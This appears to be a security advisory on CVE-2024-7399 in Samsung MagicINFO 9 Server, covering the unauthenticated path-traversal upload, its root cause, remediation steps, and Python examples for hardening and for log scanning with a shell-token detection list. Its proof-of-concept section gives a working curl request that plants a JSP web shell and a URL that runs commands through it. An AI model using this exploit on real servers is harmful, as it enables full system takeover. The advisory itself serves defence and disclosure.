A severe security vulnerability (CVE-2024-7399) has been discovered in Samsung’s MagicINFO 9 Server, a widely used digital signage content management system. It allows unauthenticated attackers to write arbitrary files to the server and, through that, execute arbitrary code with SYSTEM-level privileges.
The flaw, rated CVSS 9.8, exposes organizations to the risk of total server compromise and has already been exploited in the wild.
Vulnerability Overview
The vulnerability resides in the /MagicInfo/servlet/SWUpdateFileUploader endpoint, implemented by the SWUpdateFileUploadServlet class. This endpoint:
- Does not require authentication for file uploads.
- Accepts a fileName parameter without proper validation or extension checking.
- Fails to neutralize path traversal sequences, allowing attackers to write files to arbitrary server locations.
Root Cause
The endpoint constructs the destination path by concatenating a constant directory, a timestamp, and the user-supplied fileName parameter:

```java
String savedFileName = System.currentTimeMillis() + fileName;
swUpdateFilePath = swUpdateFileFolderPath + File.separator + savedFileName;
```
Nothing in this code rejects path separators or ../ sequences, and the timestamp is prepended to fileName without any separator. A fileName that begins with ./ therefore turns the timestamp into a throwaway directory component (for example 1700000000000./), which the first ../ immediately discards; the remaining ../ sequences then walk out of the upload folder. This lets attackers upload malicious JSP files (web shells) to executable locations on the server, leading to remote code execution with SYSTEM privileges.
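To make the defect and its fix concrete, here is an added example (not code from the article or from Samsung) that reproduces the flawed concatenation in Python and puts a hardened version beside it. The base directory, the fixed timestamp and the extension allowlist are assumptions chosen for the demo, not MagicINFO's real values; the containment check is the same canonicalize-then-compare logic the Java servlet should perform with File.getCanonicalPath().

```python
import posixpath
import re
from typing import Optional

# Constructed stand-ins for the servlet's constants (assumptions, not MagicINFO's real paths).
SW_UPDATE_DIR = "/opt/MagicInfo/swupdate"
TIMESTAMP = 1700000000000          # stands in for System.currentTimeMillis(), fixed for a repeatable demo
ALLOWED_EXTENSIONS = {".zip", ".bin"}  # assumed allowlist for software update packages


def vulnerable_save_path(file_name: str, base_dir: str = SW_UPDATE_DIR, ts: int = TIMESTAMP) -> str:
    """Mirror of the flawed code: folder + separator + timestamp + fileName, no checks.

    posixpath.normpath shows where the path lexically resolves to, which is what the
    filesystem will do with the ../ components at write time.
    """
    saved_file_name = f"{ts}{file_name}"
    return posixpath.normpath(posixpath.join(base_dir, saved_file_name))


class UnsafeFileName(ValueError):
    """Raised when a client-supplied name must not be used to build a path."""


def safe_save_path(file_name: str, base_dir: str = SW_UPDATE_DIR, ts: int = TIMESTAMP) -> str:
    """Hardened variant: allowlist the name, then prove the result stays inside base_dir."""
    # The real server runs on Windows, where backslash is also a separator.
    name = file_name.replace("\\", "/")

    # 1. Only a bare file name is acceptable: no directory components, no dot-names.
    if "/" in name or name in ("", ".", ".."):
        raise UnsafeFileName(f"directory components not allowed: {file_name!r}")

    # 2. Conservative character set and an extension allowlist (rejects .jsp outright).
    if not re.fullmatch(r"[A-Za-z0-9._-]+", name):
        raise UnsafeFileName(f"disallowed characters in name: {file_name!r}")
    if posixpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UnsafeFileName(f"extension not in allowlist: {file_name!r}")

    # 3. Defense in depth: canonicalize and confirm the result is still under base_dir.
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, f"{ts}{name}"))
    if posixpath.commonpath([base, candidate]) != base:
        raise UnsafeFileName(f"resolved outside upload folder: {candidate}")
    return candidate


def hardened_result(file_name: str) -> Optional[str]:
    """Convenience wrapper: the safe path, or None when the hardened check rejects the name."""
    try:
        return safe_save_path(file_name)
    except UnsafeFileName:
        return None


if __name__ == "__main__":
    poc_name = "./../../../../../../server/shell.jsp"   # the fileName from the public PoC
    print("vulnerable:", vulnerable_save_path(poc_name))  # lands outside SW_UPDATE_DIR
    print("hardened:  ", hardened_result(poc_name))       # None: rejected
    print("legit:     ", hardened_result("firmware_v2.zip"))
```

Run against the PoC fileName, the vulnerable function resolves to /server/shell.jsp (the timestamp is absorbed into the throwaway 1700000000000./ component), while the hardened function rejects it at the first check and would still reject it at the containment check if the earlier ones were removed.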
Proof of Concept Exploit
A typical attack sends a single crafted POST request to the vulnerable endpoint, with the JSP web shell as the request body and the traversal payload in the fileName parameter:

```bash
curl -kis -H "Content-Type: text/plain" \
--data-binary "<%@ page import=\"java.util.*,java.io.*\"%><pre><% Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } %></pre>" \
"https://$MAGIC_INFO_SERVER:7002/MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell.jsp&deviceType=abc&deviceModelName=test&swVer=123"
```
Once uploaded, the attacker executes system commands by requesting the shell with a cmd parameter:

```text
https://$MAGIC_INFO_SERVER:7002/MagicInfo/shell.jsp?cmd=cmd.exe+/c+whoami
```
Risk Factor Table
| Risk Factor | Description | Severity |
|---|---|---|
| Authentication Bypass | No authentication required to exploit the vulnerability | Critical |
| Arbitrary File Upload | Attackers can upload files (including web shells) anywhere on the server | Critical |
| Remote Code Execution | Uploaded files can be executed with SYSTEM-level privileges | Critical |
| Path Traversal | File paths are not sanitized, allowing placement in unauthorized server locations | High |
| Public Exploit Available | Proof-of-concept code is publicly accessible, lowering the barrier for attackers | High |
| Exploitation Observed | Active exploitation in the wild has been confirmed | High |
| Impact Scope | Affects all MagicINFO 9 Server versions prior to 21.1050, widely deployed in many sectors | High |
Remediation and Recommendations
Samsung has released a fix in MagicINFO 9 Server version 21.1050. Organizations are strongly advised to:
- Upgrade to version 21.1050 or later immediately.
- Audit server logs for suspicious file uploads (requests to SWUpdateFileUploader whose fileName contains ../ or a non-package extension) and for access to JSP files that are not part of the product.
- Restrict network access to MagicINFO servers where possible, in particular to the 7002/TCP service the public exploit targets.
- Treat any host where a web shell is found as fully compromised: the shell runs as SYSTEM, so removing the file is not enough, and credentials on the host should be rotated and the system rebuilt from a known-good state.
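The log audit above can be automated. The following added example (not from the article or from Samsung) parses web-server access log lines, flags upload requests whose fileName carries traversal or an unexpected extension, and then correlates later requests for a JSP whose basename matches a file an earlier upload tried to write. The sample lines are constructed in Apache/Tomcat combined format; MagicINFO's actual log layout is an assumption, so adjust LOG_RE to match your server.

```python
import posixpath
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (combined log format assumed; addresses are documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [05/May/2025:10:14:02 +0000] "POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell.jsp&deviceType=abc&deviceModelName=test&swVer=123 HTTP/1.1" 200 12
203.0.113.7 - - [05/May/2025:10:14:05 +0000] "GET /MagicInfo/shell.jsp?cmd=cmd.exe+/c+whoami HTTP/1.1" 200 31
198.51.100.4 - - [05/May/2025:10:20:11 +0000] "POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=firmware_v2.zip&deviceType=LFD&deviceModelName=QM55&swVer=2 HTTP/1.1" 200 12
198.51.100.4 - - [05/May/2025:10:21:00 +0000] "GET /MagicInfo/login.htm HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_ENDPOINT = "/MagicInfo/servlet/SWUpdateFileUploader"
ALLOWED_EXTENSIONS = {".zip", ".bin"}          # assumed allowlist for legitimate update packages
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SHELL_TOKENS = ("cmd.exe", "powershell", "/bin/sh", "bash -c")  # heuristic for command-style params


def _params(query: str) -> Dict[str, str]:
    """First value of each query parameter, decoded twice to catch double URL encoding."""
    return {k: unquote(v[0]) for k, v in parse_qs(query, keep_blank_values=True).items()}


def scan_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious line: {ip, ts, target, reason}."""
    uploaded_basenames = set()   # basenames that upload requests tried to write, for correlation
    findings: List[Dict[str, str]] = []

    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        params = _params(parts.query)
        reasons: List[str] = []

        if parts.path == UPLOAD_ENDPOINT:
            name = params.get("fileName", "")
            if TRAVERSAL_RE.search(name) or re.search(r"[\\/]", name):
                reasons.append("path traversal in fileName")
            if posixpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
                reasons.append("unexpected upload extension")
            basename = re.split(r"[\\/]", name)[-1].lower()
            if basename:
                uploaded_basenames.add(basename)

        elif parts.path.lower().endswith(".jsp"):
            basename = parts.path.rsplit("/", 1)[-1].lower()
            if basename in uploaded_basenames:
                reasons.append("access to JSP written by earlier upload")
            if any(tok in v.lower() for v in params.values() for tok in SHELL_TOKENS):
                reasons.append("shell-like parameter in JSP request")

        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"],
                             "reason": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['target']}")
```

On the sample, the scanner reports the traversal upload and the subsequent request for shell.jsp from the same address, and stays silent on the legitimate firmware_v2.zip upload. The upload-then-access correlation is the higher-confidence signal; the SHELL_TOKENS check is a heuristic and should be tuned to the environment.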
Given the ease of exploitation (a single unauthenticated request), the public availability of attack code, and the SYSTEM-level impact, this vulnerability poses a significant threat to organizations running Samsung MagicINFO 9 Server. Prompt patching and log review are essential to mitigate the risk.